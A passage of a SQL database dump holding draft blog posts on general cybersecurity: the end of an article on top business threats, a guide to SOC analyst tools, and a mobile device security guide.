In 2023, phishing attacks saw a 70% success rate, affecting countless organizations.\r\n<h3 id=\"combating-phishing-attacks\">Combating Phishing Attacks</h3>\r\n<ul>\r\n 	<li><strong>Identification Training:</strong> Teach employees how to recognize phishing attempts.</li>\r\n 	<li><strong>Email Security Solutions:</strong> Invest in robust email filters and scanners.</li>\r\n 	<li><strong>Awareness Campaigns:</strong> Regularly update training on social engineering tactics.</li>\r\n</ul>\r\n<h2 id=\"supply-chain-attacks\">Supply Chain Attacks</h2>\r\n<h3 id=\"vulnerabilities-in-third-party-software\">Vulnerabilities in Third-Party Software</h3>\r\nData breaches linked to third-party vulnerabilities increased by 30% last year. A notable example is the SolarWinds attack, which compromised thousands of organizations.\r\n<h3 id=\"securing-your-supply-chain\">Securing Your Supply Chain</h3>\r\n<ul>\r\n 	<li><strong>Vetting Vendors:</strong> Assess the security practices of third-party vendors.</li>\r\n 	<li><strong>Access Controls:</strong> Use strong access management to limit data access.</li>\r\n 	<li><strong>Threat Intelligence:</strong> Stay informed about potential risks using intelligence tools.</li>\r\n</ul>\r\n<h2 id=\"cloud-security-threats\">Cloud Security Threats</h2>\r\n<h3 id=\"data-breaches-in-cloud-environments\">Data Breaches in Cloud Environments</h3>\r\nMisconfigurations in cloud settings have led to numerous data breaches, with a 45% increase in such incidents reported in 2023.\r\n<h3 id=\"best-practices-for-cloud-security\">Best Practices for Cloud Security</h3>\r\n<ul>\r\n 	<li><strong>Configuration Management:</strong> Keep cloud resources properly configured.</li>\r\n 	<li><strong>Data Encryption:</strong> Always encrypt sensitive data stored in the cloud.</li>\r\n 	<li><strong>Regular Audits:</strong> Conduct security audits and penetration tests to find weaknesses.</li>\r\n</ul>\r\n<h2 id=\"iot-security-risks\">IoT Security Risks</h2>\r\n<h3 
id=\"vulnerabilities-in-iot-devices\">Vulnerabilities in IoT Devices</h3>\r\nIoT device attacks surged by 40%, causing concern across many sectors. There have been instances where smart devices were exploited to gain network access.\r\n<h3 id=\"securing-iot-devices\">Securing IoT Devices</h3>\r\n<ul>\r\n 	<li><strong>Strong Passwords:</strong> Always use complex passwords and change them regularly.</li>\r\n 	<li><strong>Network Segmentation:</strong> Isolate IoT devices from critical networks.</li>\r\n 	<li><strong>Access Controls:</strong> Enforce strict access controls on IoT devices.</li>\r\n</ul>\r\n<h2 id=\"insider-threats\">Insider Threats</h2>\r\n<h3 id=\"malicious-and-negligent-insiders\">Malicious and Negligent Insiders</h3>\r\nInsiders are responsible for 30% of data breaches. These breaches can be either malicious actions or simple negligence, highlighting the importance of managing insider threats.\r\n<h3 id=\"mitigating-insider-risks\">Mitigating Insider Risks</h3>\r\n<ul>\r\n 	<li><strong>Access Controls:</strong> Implement the principle of least privilege.</li>\r\n 	<li><strong>Monitoring:</strong> Regularly log and monitor employee activities.</li>\r\n 	<li><strong>Training:</strong> Consistently provide security awareness training to all employees.</li>\r\n</ul>\r\n<h2 id=\"ai-powered-attacks\">AI-Powered Attacks</h2>\r\n<h3 id=\"rise-of-ai-driven-malware\">Rise of AI-Driven Malware</h3>\r\nAI is increasingly used to craft sophisticated malware. 
Experiments have shown AI can produce malware that successfully bypasses many traditional defenses.\r\n<h3 id=\"defending-against-ai-powered-attacks\">Defending Against AI-Powered Attacks</h3>\r\n<ul>\r\n 	<li><strong>Advanced Detection Systems:</strong> Use AI tools to enhance threat detection.</li>\r\n 	<li><strong>Stay Updated:</strong> Always be aware of emerging threats.</li>\r\n 	<li><strong>Proactive Measures:</strong> Regularly assess and update security protocols.</li>\r\n</ul>\r\n<h2 id=\"ddos-attacks\">DDoS Attacks</h2>\r\n<h3 id=\"evolution-of-ddos-attacks\">Evolution of DDoS Attacks</h3>\r\nThe percentage of businesses experiencing Distributed Denial of Service (DDoS) attacks increased by 25%. Major attacks can disrupt services and harm company reputations.\r\n<h3 id=\"protecting-against-ddos-attacks\">Protecting Against DDoS Attacks</h3>\r\n<ul>\r\n 	<li><strong>Mitigation Solutions:</strong> Utilize DDoS protection services.</li>\r\n 	<li><strong>Regular Testing:</strong> Perform security audits and penetration tests regularly.</li>\r\n 	<li><strong>Incident Response Plan:</strong> Create and regularly update a DDoS response strategy.</li>\r\n</ul>\r\n<h2 id=\"mobile-device-security-threats\">Mobile Device Security Threats</h2>\r\n<h3 id=\"risks-associated-with-mobile-devices\">Risks Associated with Mobile Devices</h3>\r\nMobile malware incidents rose by 35%. 
Businesses often overlook the security of mobile devices, leading to potential breaches.\r\n<h3 id=\"securing-mobile-devices\">Securing Mobile Devices</h3>\r\n<ul>\r\n 	<li><strong>Security Policies:</strong> Create and enforce mobile device security policies.</li>\r\n 	<li><strong>Mobile Device Management:</strong> Implement MDM solutions to monitor and protect devices.</li>\r\n 	<li><strong>Awareness Training:</strong> Ensure employees are educated on mobile security threats.</li>\r\n</ul>\r\n<h2 id=\"cryptojacking\">Cryptojacking</h2>\r\n<h3 id=\"the-growing-threat-of-cryptojacking\">The Growing Threat of Cryptojacking</h3>\r\nCryptojacking attacks have increased by 50%, with attackers secretly using businesses’ computing power for cryptocurrency mining.\r\n<h3 id=\"mitigating-cryptojacking-risks\">Mitigating Cryptojacking Risks</h3>\r\n<ul>\r\n 	<li><strong>Regular Scans:</strong> Frequently scan for malicious software.</li>\r\n 	<li><strong>Endpoint Detection Solutions:</strong> Use EDR solutions for additional protection.</li>\r\n 	<li><strong>Stay Informed:</strong> Keep updated on new cryptojacking techniques.</li>\r\n</ul>\r\nCybersecurity continues to be a top priority as businesses face increasing threats. From ransomware to cryptojacking, understanding the landscape is essential for proactive defense. Companies must adopt effective mitigation strategies to secure their assets. Act now to strengthen your cybersecurity posture and stay informed about these evolving threats.', '', NULL, NULL, 1, 'draft', '2024-12-11 13:15:17', '2026-01-12 21:41:44', 'Information Security', 'Top 10 Cybersecurity Threats Facing Businesses in 2024', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(88, 'The Essential Security Analyst Toolkit: Comprehensive Guide for SOC Professionals', 'the-essential-security-analyst-toolkit', 'Security Operations Center (SOC) analysts play a crucial role in protecting organizations from an ever-growing array of threats. To effectively monitor, detect, analyze, and respond to these challenges, SOC analysts rely on a diverse set of powerful tools. This comprehensive guide explores the essential tools every security analyst should be familiar with, providing insights into their functions and recommending some of the most popular solutions in each category.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">SIEM: The Central Hub of Security Operations</h3>\r\nSecurity Information and Event Management (SIEM) systems serve as the cornerstone of any robust SOC. These platforms collect, normalize, and analyze security data from various sources across the network, providing real-time insights into potential threats and policy violations. Key functions of SIEM tools include:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Centralized log management</li>\r\n 	<li>Real-time monitoring and alerting</li>\r\n 	<li>Incident response coordination</li>\r\n 	<li>Compliance reporting</li>\r\n</ul>\r\nPopular SIEM solutions:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.splunk.com/\" target=\"_blank\" rel=\"nofollow noopener\">Splunk</a>: A powerful platform for searching, monitoring, and analyzing machine-generated big data.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://securityonionsolutions.com/\" target=\"_blank\" 
rel=\"nofollow noopener\">Security Onion</a>: A free and open-source platform for threat hunting, network security monitoring, and log management.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://logrhythm.com/\" target=\"_blank\" rel=\"nofollow noopener\">LogRhythm</a>: An enterprise-class platform that combines SIEM, log management, and machine analytics.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.ibm.com/products/qradar-siem\" target=\"_blank\" rel=\"nofollow noopener\">IBM QRadar</a>: A comprehensive SIEM solution for threat detection and compliance.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.microfocus.com/en-us/products/siem-security-information-event-management/overview\" target=\"_blank\" rel=\"nofollow noopener\">ArcSight</a>: A SIEM platform by Micro Focus for security monitoring and log management.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">IDS/IPS: Real-time Threat Detection and Prevention</h3>\r\nIntrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are critical components of a layered security approach. 
While IDS focuses on monitoring and alerting, IPS takes it a step further by actively blocking or preventing detected threats. Popular IDS/IPS tools:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.snort.org/\" target=\"_blank\" rel=\"nofollow noopener\">Snort</a>: Open-source network IDS/IPS for real-time traffic analysis.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://suricata.io/\" target=\"_blank\" rel=\"nofollow noopener\">Suricata</a>: High-performance IDS, IPS, and network security monitoring engine.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.ossec.net/\" target=\"_blank\" rel=\"nofollow noopener\">OSSEC</a>: An open-source host-based IDS for log analysis and file integrity checking.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\" target=\"_blank\" rel=\"nofollow noopener\">Cisco Firepower</a>: A comprehensive IPS solution providing advanced threat protection.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" 
href=\"https://www.paloaltonetworks.com/network-security/next-generation-firewall\" target=\"_blank\" rel=\"nofollow noopener\">Palo Alto Networks</a>: Offers next-generation firewall capabilities with integrated IPS functionality.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">EDR: Securing the Endpoint Frontier</h3>\r\nEndpoint Detection and Response (EDR) solutions focus on detecting, investigating, and responding to suspicious activities on endpoints such as computers, servers, and mobile devices. Key features of EDR tools:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Advanced threat detection</li>\r\n 	<li>Incident response capabilities</li>\r\n 	<li>Continuous endpoint monitoring</li>\r\n</ul>\r\nPopular EDR solutions:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.crowdstrike.com/\" target=\"_blank\" rel=\"nofollow noopener\">CrowdStrike Falcon</a>: Offers advanced threat intelligence and endpoint protection.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.sentinelone.com/\" target=\"_blank\" rel=\"nofollow noopener\">SentinelOne</a>: Provides autonomous endpoint protection through AI-powered detection and response.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.carbonblack.com/\" target=\"_blank\" rel=\"nofollow noopener\">Carbon Black</a>: Delivers advanced threat detection and response capabilities.</li>\r\n 	<li><a 
class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender\" target=\"_blank\" rel=\"nofollow noopener\">Microsoft Defender for Endpoint</a>: Integrated endpoint security platform.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">SOAR: Streamlining Security Operations</h3>\r\nSecurity Orchestration, Automation, and Response (SOAR) solutions enhance the efficiency of security operations by automating incident response and orchestrating various security tools. Key benefits of SOAR platforms:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Automation of repetitive tasks</li>\r\n 	<li>Streamlined incident response</li>\r\n 	<li>Improved tool integration and coordination</li>\r\n</ul>\r\nPopular SOAR tools:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.paloaltonetworks.com/cortex/xsoar\" target=\"_blank\" rel=\"nofollow noopener\">Palo Alto Networks Cortex XSOAR</a>: Automates security operations and incident response.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.splunk.com/en_us/software/splunk-security-orchestration-and-automation.html\" target=\"_blank\" rel=\"nofollow noopener\">Splunk Phantom</a>: Enables automation of security workflows.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font 
underline-offset-1 transition-all duration-300\" href=\"https://swimlane.com/\" target=\"_blank\" rel=\"nofollow noopener\">Swimlane</a>: Provides orchestration and automation for SOC processes.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">TIP: Leveraging Threat Intelligence</h3>\r\nThreat Intelligence Platforms (TIP) aggregate, analyze, and share threat intelligence data from various sources to improve threat detection and response capabilities. Popular TIP solutions:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://talosintelligence.com/\" target=\"_blank\" rel=\"nofollow noopener\">Cisco Talos</a>: The world\'s most comprehensive real-time threat detection network.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://threatconnect.com/\" target=\"_blank\" rel=\"nofollow noopener\">ThreatConnect</a>: Aggregates, analyzes, and acts on threat intelligence.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.recordedfuture.com/\" target=\"_blank\" rel=\"nofollow noopener\">Recorded Future</a>: Provides real-time threat intelligence.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.misp-project.org/\" target=\"_blank\" rel=\"nofollow noopener\">MISP</a>: Facilitates sharing of threat 
intelligence.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">OSINT: Harnessing Open-Source Intelligence</h3>\r\nOpen-Source Intelligence (OSINT) tools help analysts collect and analyze publicly available information to generate actionable intelligence. Key applications of OSINT:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Threat identification</li>\r\n 	<li>Contextual analysis</li>\r\n 	<li>Proactive defense</li>\r\n</ul>\r\nPopular OSINT tools:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://osintframework.com/\" target=\"_blank\" rel=\"nofollow noopener\">OSINT Framework</a>: A comprehensive collection of OSINT tools and resources.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlscan.io/\" target=\"_blank\" rel=\"nofollow noopener\">URLSCAN.io</a>: An online service for analyzing and inspecting website contents.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.maltego.com/\" target=\"_blank\" rel=\"nofollow noopener\">Maltego</a>: A data visualization tool used for OSINT and link analysis.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://github.com/lanmaster53/recon-ng\" target=\"_blank\" rel=\"nofollow noopener\">Recon-ng</a>: A web reconnaissance framework with 
numerous modules for OSINT tasks.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://github.com/laramies/theHarvester\" target=\"_blank\" rel=\"nofollow noopener\">theHarvester</a>: A tool for gathering emails, subdomains, hosts, and other information from public sources.</li>\r\n</ol>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">Additional Essential Tools for SOC Analysts</h2>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Vulnerability Management</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.tenable.com/products/tenable-io\" target=\"_blank\" rel=\"nofollow noopener\">Tenable.io</a>: Comprehensive vulnerability management platform.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.qualys.com/\" target=\"_blank\" rel=\"nofollow noopener\">Qualys</a>: Cloud-based security and compliance solutions.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.tenable.com/products/nessus\" target=\"_blank\" rel=\"nofollow noopener\">Nessus</a>: Widely used vulnerability scanner.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Malware Analysis and Sandboxing</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super 
dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://any.run/\" target=\"_blank\" rel=\"nofollow noopener\">Any.run</a>: Investigate malware in a sandbox environment, also provides threat intelligence.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virustotal.com/\" target=\"_blank\" rel=\"nofollow noopener\">VirusTotal</a>: A web-based service for scanning files and URLs for potential malware.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.fireeye.com/products/malware-analysis.html\" target=\"_blank\" rel=\"nofollow noopener\">FireEye Malware Analysis</a>: Advanced sandboxing solution.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virtualbox.org/\" target=\"_blank\" rel=\"nofollow noopener\">Oracle VirtualBox</a>: Create isolated environments for malware analysis.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Log Management</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.elastic.co/what-is/elk-stack\" target=\"_blank\" rel=\"nofollow noopener\">ELK Stack</a>: Open-source log management solution (Elasticsearch, Logstash, Kibana).</li>\r\n 	<li><a class=\"break-word 
hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.graylog.org/\" target=\"_blank\" rel=\"nofollow noopener\">Graylog</a>: Centralizes and analyzes log data.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.sumologic.com/\" target=\"_blank\" rel=\"nofollow noopener\">Sumo Logic</a>: Cloud-native log management and analytics.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Digital Forensics</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://accessdata.com/products-services/forensic-toolkit-ftk\" target=\"_blank\" rel=\"nofollow noopener\">FTK (Forensic Toolkit)</a>: Comprehensive digital forensics solution.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.opentext.com/products-and-solutions/products/security/encase-forensic\" target=\"_blank\" rel=\"nofollow noopener\">EnCase</a>: Provides digital investigation and forensic capabilities.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.volatilityfoundation.org/\" target=\"_blank\" rel=\"nofollow noopener\">Volatility</a>: Open-source memory forensics framework.</li>\r\n</ol>\r\nThe tools 
outlined in this guide form the backbone of a modern SOC analyst\'s toolkit. By leveraging these powerful solutions, security professionals can effectively monitor, detect, and respond to the ever-evolving landscape of cyber threats. However, it\'s crucial to remember that tools are only as effective as the analysts using them. Regular training, staying updated with the latest security trends, and continuous learning are essential for maximizing the potential of these tools and maintaining a robust security posture. As cyber threats continue to evolve, so too must the tools and techniques used to combat them. SOC analysts should regularly evaluate new tools and technologies to ensure they\'re equipped with the most effective solutions for protecting their organizations\' digital assets.', '', NULL, NULL, 1, 'draft', '2024-12-11 00:12:36', '2026-01-12 21:41:44', 'Information Security', 'The Essential Security Analyst Toolkit: Comprehensive Guide for SOC Professionals', '', NULL),
(89, 'How to Lock Down Your Mobile Devices: The Ultimate Security Guide', 'how-to-lock-down-your-mobile-devices-the-ultimate-security-guide', 'Did you know that over 50% of mobile devices have unpatched vulnerabilities? This alarming statistic underscores how exposed our personal information can be if we don’t take mobile security seriously. With the rising number of transactions and communication happening through smartphones, the chances of cyber threats are also soaring.\r\n\r\nAs we increasingly rely on mobile devices for everything—from banking to social media—it\'s crucial to understand the security risks involved. This article aims to provide a comprehensive guide on safeguarding your mobile devices from potential threats.\r\n<h3 id=\"secure-your-mobile-operating-system\">Secure Your Mobile Operating System</h3>\r\n<h4 id=\"update-your-os\">Update Your OS</h4>\r\nKeeping your device\'s operating system up to date is vital. Regular OS updates patch known vulnerabilities, helping to shield your device from threats. In fact, studies show that 60% of security vulnerabilities are fixed in software updates. To enable automatic updates:\r\n<ol>\r\n 	<li><strong>iOS</strong>: Go to Settings &gt; General &gt; Software Update &gt; Automatic Updates, then toggle it on.</li>\r\n 	<li><strong>Android</strong>: Open Settings &gt; System &gt; Advanced &gt; System Update &gt; Automatically check for updates.</li>\r\n</ol>\r\n<h4 id=\"enable-automatic-security-updates\">Enable Automatic Security Updates</h4>\r\nTaking further steps to secure your device is easy. 
Enabling automatic security updates means you won’t miss critical patches.\r\n<ul>\r\n 	<li><strong>iOS</strong>: Follow the same steps above for Automatic Updates.</li>\r\n 	<li><strong>Android</strong>: Go to Settings &gt; Security &gt; Google Play system update &gt; Enable automatic updates (exact menu names vary by Android version and manufacturer).</li>\r\n</ul>\r\n<h4 id=\"use-a-strong-passcodebiometrics\">Use a Strong Passcode/Biometrics</h4>\r\nA strong passcode is your first line of defense, and on modern iOS and Android it also protects the keys that encrypt the data stored on the device. Avoid short numeric PINs, which can be guessed or shoulder-surfed; use at least six digits, or better a longer alphanumeric passcode. Biometric authentication (like fingerprint or facial recognition) adds convenience and protects against casual observation, but the device still falls back to the passcode, so passcode strength is what ultimately matters. Weak passcodes can easily be guessed, putting your data at risk.\r\n<h3 id=\"strengthen-your-mobile-app-security\">Strengthen Your Mobile App Security</h3>\r\n<h4 id=\"app-permissions\">App Permissions</h4>\r\nReviewing app permissions is essential. Many apps request access to data unrelated to their purpose. Revoking unnecessary permissions can save your data from malicious use. For example, a seemingly harmless flashlight app may ask for your location, which is unnecessary.\r\n<h4 id=\"download-from-official-app-stores\">Download from Official App Stores</h4>\r\nAlways download apps from official sources like Google Play Store or Apple App Store. Third-party sources can host malicious apps that compromise your data, and sideloaded apps bypass the store\'s review and malware scanning. According to cybersecurity experts, downloading apps from unofficial sites can lead to malware infections.\r\n<h4 id=\"keep-apps-updated\">Keep Apps Updated</h4>\r\nJust like your OS, apps need updates too. Outdated apps are often targets for hackers. 
Enable auto-updates in your app store settings:\r\n<ul>\r\n 	<li><strong>iOS</strong>: Go to Settings &gt; App Store &gt; App Updates &gt; Toggle to On.</li>\r\n 	<li><strong>Android</strong>: Open Google Play Store &gt; Menu &gt; Settings &gt; Auto-update apps.</li>\r\n</ul>\r\n<h3 id=\"protect-your-mobile-data--privacy\">Protect Your Mobile Data &amp; Privacy</h3>\r\n<h4 id=\"use-a-strong-password-manager\">Use a Strong Password Manager</h4>\r\nPassword managers help you create and store strong, unique passwords for each account. Popular options include LastPass, 1Password, and Bitwarden. Because every account then has a different password, one leaked password no longer unlocks the rest of your accounts. Protect the manager itself with a long master passphrase and 2FA.\r\n<h4 id=\"enable-two-factor-authentication-2fa\">Enable Two-Factor Authentication (2FA)</h4>\r\n2FA requires a second form of identification beyond just your password. This adds an extra safety net. You can enable 2FA for platforms like Google, Facebook, and banking apps. Look for the security settings in your account. Prefer an authenticator app, a passkey, or a hardware security key over SMS codes where you can: SMS codes can be intercepted through SIM-swap attacks, and app- or key-based factors are also much harder to phish.\r\n<h4 id=\"avoid-public-wi-fi\">Avoid Public Wi-Fi</h4>\r\nOn public Wi-Fi, anyone on the same network (or running a look-alike \"evil twin\" hotspot) can observe or tamper with unencrypted traffic. Most apps now use TLS, but avoid sensitive transactions anyway, and never accept a certificate warning on a public network. If you must connect, a virtual private network (VPN) protects your traffic from the local network operator, though not from a malicious app already on the device.\r\n<h3 id=\"safe-browsing--phishing-prevention\">Safe Browsing &amp; Phishing Prevention</h3>\r\n<h4 id=\"recognize-phishing-attempts\">Recognize Phishing Attempts</h4>\r\nPhishing scams often come via email or text message, tricking you into revealing personal information. Common techniques include fake links and urgent requests for sensitive data. Always verify the sender before clicking.\r\n<h4 id=\"be-cautious-of-suspicious-links-and-attachments\">Be Cautious of Suspicious Links and Attachments</h4>\r\nNever click on unknown links or download attachments from untrusted sources. Cybercriminals use these tactics to spread malware. 
According to cybersecurity statistics, nearly 90% of breaches start with a phishing attack.\r\n<h4 id=\"use-a-reputable-antivirus-app\">Use a Reputable Antivirus App</h4>\r\nMobile antivirus apps can help detect threats and provide real-time protection. Look for well-known options, such as Norton, McAfee, or Bitdefender, to keep your device secure.\r\n<h3 id=\"safe-mobile-device-management\">Safe Mobile Device Management</h3>\r\n<h4 id=\"regularly-back-up-your-data\">Regularly Back Up Your Data</h4>\r\nBacking up your data can help you recover critical information in case your device gets lost or damaged. Use cloud services like Google Drive or iCloud for automatic backups.\r\n<h4 id=\"locate-your-device-remotely\">Locate Your Device Remotely</h4>\r\nIf your mobile device goes missing, you can track it down using built-in features. Use:\r\n<ul>\r\n 	<li><strong>iOS</strong>: Find My iPhone</li>\r\n 	<li><strong>Android</strong>: Find My Device</li>\r\n</ul>\r\nBoth tools allow you to locate and even remotely wipe your data for security.\r\n<h4 id=\"consider-a-mobile-device-management-mdm-solution\">Consider a Mobile Device Management (MDM) Solution</h4>\r\nFor businesses or individuals with multiple devices, using an MDM solution helps streamline security measures across all devices. This kind of management provides an easy way to enforce security policies.\r\n\r\nTo ensure your mobile devices remain safe, remember these key practices: regularly update your operating system and apps, use strong passwords and 2FA, and be cautious of public Wi-Fi and phishing attempts.\r\n\r\nImplementing these security measures can significantly reduce the risk of data breaches and identity theft. Protect your mobile devices today to enjoy peace of mind in an increasingly connected world.', '', NULL, NULL, 1, 'draft', '2024-12-09 23:20:42', '2026-01-12 21:41:44', 'Information Security', 'How to Lock Down Your Mobile Devices: The Ultimate Security Guide', '', NULL),
